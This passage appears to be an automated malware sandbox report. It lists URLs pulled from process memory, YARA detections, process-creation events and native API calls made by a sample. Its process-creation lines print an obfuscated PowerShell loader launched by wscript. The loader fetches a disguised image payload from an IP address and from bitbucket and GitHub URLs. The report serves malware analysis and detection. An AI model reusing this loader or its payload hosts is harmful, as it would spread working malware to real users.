53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
        Source: powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.20.102.62
        Source: powershell.exe, 00000002.00000002.2612166769.0000020F40D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D4467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243710855.00000127CD274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD365000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243758814.00000127CD280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.20.102.62/new_img.jpg
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D5B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000002.00000002.2612166769.0000020F40898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: WKOyCvoOlM.exe, 0000000A.00000002.3406481962.0000000004EB7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.030002350.xyz
        Source: WKOyCvoOlM.exe, 0000000A.00000002.3406481962.0000000004EB7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.030002350.xyz/wrcq/
        Source: powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000004.00000002.2243914566.00000127CD2F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 00000002.00000002.2612166769.0000020F40850000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2612166769.0000020F4086A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D4DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D50EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 00000002.00000002.2612166769.0000020F40D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D4467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243710855.00000127CD274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD365000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243758814.00000127CD280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: where.exe, 00000008.00000002.3405546672.000000000599C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3405063400.00000000033FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D548A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5B35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf;fbQ
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: where.exe, 00000008.00000003.2669991240.0000000007BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/richie213/ani/refs/heads/main/jdikobc.txt
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: where.exe, 00000008.00000002.3407014638.0000000007970000.00000004.00000800.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000005354000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3405063400.0000000002DB4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B7A4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3292, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$GJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042CCC3 NtClose,5_2_0042CCC3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040AC20 NtDelayExecution,5_2_0040AC20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032335C0 NtCreateMutant,LdrInitializeThunk,5_2_032335C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232B60 NtClose,LdrInitializeThunk,5_2_03232B60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03232DF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03232C70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03234340 NtSetContextThread,5_2_03234340
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03233010 NtOpenDirectoryObject,5_2_03233010
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03233090 NtSetValueKey,5_2_03233090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03234650 NtSuspendThread,5_2_03234650
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232BA0 NtEnumerateValueKey,5_2_03232BA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232B80 NtQueryInformationFile,5_2_03232B80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232BE0 NtQueryValueKey,5_2_03232BE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232BF0 NtAllocateVirtualMemory,5_2_03232BF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232AB0 NtWaitForSingleObject,5_2_03232AB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232AF0 NtWriteFile,5_2_03232AF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232AD0 NtReadFile,5_2_03232AD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032339B0 NtGetContextThread,5_2_032339B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232F30 NtCreateSection,5_2_03232F30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232F60 NtCreateProcessEx,5_2_03232F60
